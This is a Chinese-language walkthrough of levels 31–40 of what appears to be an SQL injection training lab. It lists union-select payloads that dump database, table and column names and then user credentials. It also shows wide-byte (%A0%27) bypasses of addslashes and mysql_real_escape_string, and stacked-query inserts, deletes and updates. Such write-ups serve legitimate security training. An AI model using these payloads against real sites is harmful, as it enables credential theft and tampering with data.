第三十一关
这一关与前两天一样,只是")闭合
?id=1&id=1")order by 4--+
#确定显位
?id=1&id=-1")union select 1,2,database()--+
#爆库
?id=1&id=-1")union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
#爆表
?id=1&id=-1")union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
#爆列
?id=1&id=-1")union select 1,2,group_concat(username,password) from users--+
#爆字段
获取全部的账号密码信息,过关
第三十二关
本关主要是宽字节注入
有这行代码才可行
这一关存在addslashes过滤,会转义加上一个\
只需要在写成
?id=1%A0%27--+
写成%A0%27的情况下 addslashes会无视掉%A0而直接给%27加斜线,斜线是%5C 于是就变成了这样子 %A0%5C%27,前面两个构成一个宽字符 然后%27就单独被解析了
接下来就常规注入了
?id=-1%A0%27order by 4--+
?id=-1%A0%27union select 1,2,3--+
#判断显位
?id=-1%A0%27union select 1,2,database()--+
#爆库
?id=-1%A0%27union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
#爆表
?id=-1%A0%27union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+
#因为单引号都被过滤了,所以我们需要使用十六进制,然后在前面加上0x
?id=-1%A0%27union select 1,2,group_concat(username,password) from users--+
得到全部的账号密码信息
过关
第三十三关
这关与三十二关一模一样
?id=1%A0'order by 4--+
?id=-1%A0'union select 1,2,3--+
?id=-1%A0'union select 1,2,database()--+
?id=-1%A0'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
?id=-1%A0'union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+
?id=-1%A0'union select 1,2,group_concat(username,password) from users--+
过关
第三十四关
又是熟悉的登录界面
经过尝试,发现账号密码都存在addslashes转义
应该也是使用宽字节
账号密码都存在注入点
1%A0'order by 3--+
判断只有两位
1%A0'union select 1,2--+
判断显位
1%A0'union select 1,database()--+
爆库
1%A0'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
爆表
1%A0'union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+
爆列(需要使用单引号的需要转换成十六进制再加上0x)
1%A0'union select 1,group_concat(username,password) from users--+
爆字段
获取全部的账号密码信息
过关
第三十五关
?id=1 --+
#这关没用引号闭合
?id=1 order by 4--+
?id=-1 union select 1,2,3--+
#确定显位
?id=-1 union select 1,2,database()--+
爆库
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
爆表
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+
爆列
?id=-1 union select 1,2,group_concat(username,password) from users--+
爆字段
获取全部的账号密码信息
过关
第三十六关
这关主要是转义函数换成了mysql_real_escape_string,绕过方法与前面一致
?id=1%A0' order by 4--+
?id=-1%A0' union select 1,2,3--+
确定显位
?id=-1%A0' union select 1,2,database()--+
爆库
?id=-1%A0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
爆表
?id=-1%A0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+
爆列
?id=-1%A0 ' union select 1,2,group_concat(username,password) from users--+
爆字段
获取全部的账号密码信息
过关
第三十七关
这关主要是使用mysql_real_escape_string进行转义
与三十四关一样
1%A0'order by 3--+
1%A0'union select 1,2--+
#确定显位
1%A0'union select 1,database()--+
#爆库
1%A0'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
#爆表
1%A0'union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+
#爆列
1%A0'union select 1,group_concat(username,password) from users--+
3爆字段
获得全部的账号密码信息
过关
第三十八关
这一关就是正常的单引号闭合
但是存在堆叠注入,可以多条sql语句执行
尝试进行增删改查
?id=1';insert into users(id,username,password) values ('38','less38','hello')--+
?id=1';delete from users where username='less38'--+
?id=1';update users set username='admin5' where username='admin4'--+
?id=-1' order by 4--+
?id=-1' union select 1,2,3--+
?id=-1' union select 1,2,database()--+
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1' union select 1,2,group_concat(username,password) from users--+
获取账号密码信息
过关
第三十九关
Id参数是整数
这关正常注入就行了
?id=-1 order by 4--+
?id=-1 union select 1,2,3--+
?id=-1 union select 1,2,database()--+
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1 union select 1,2,group_concat(username,password) from users--+
获取账号密码信息
过关
第四十关
这关是单引号括号闭合
正常使用联合查询就行了
?id=-1')union select 1,2,3--+
?id=-1')union select 1,2,database()--+
?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1')union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1')union select 1,2,group_concat(username,password) from users--+
获取全部账号密码信息
过关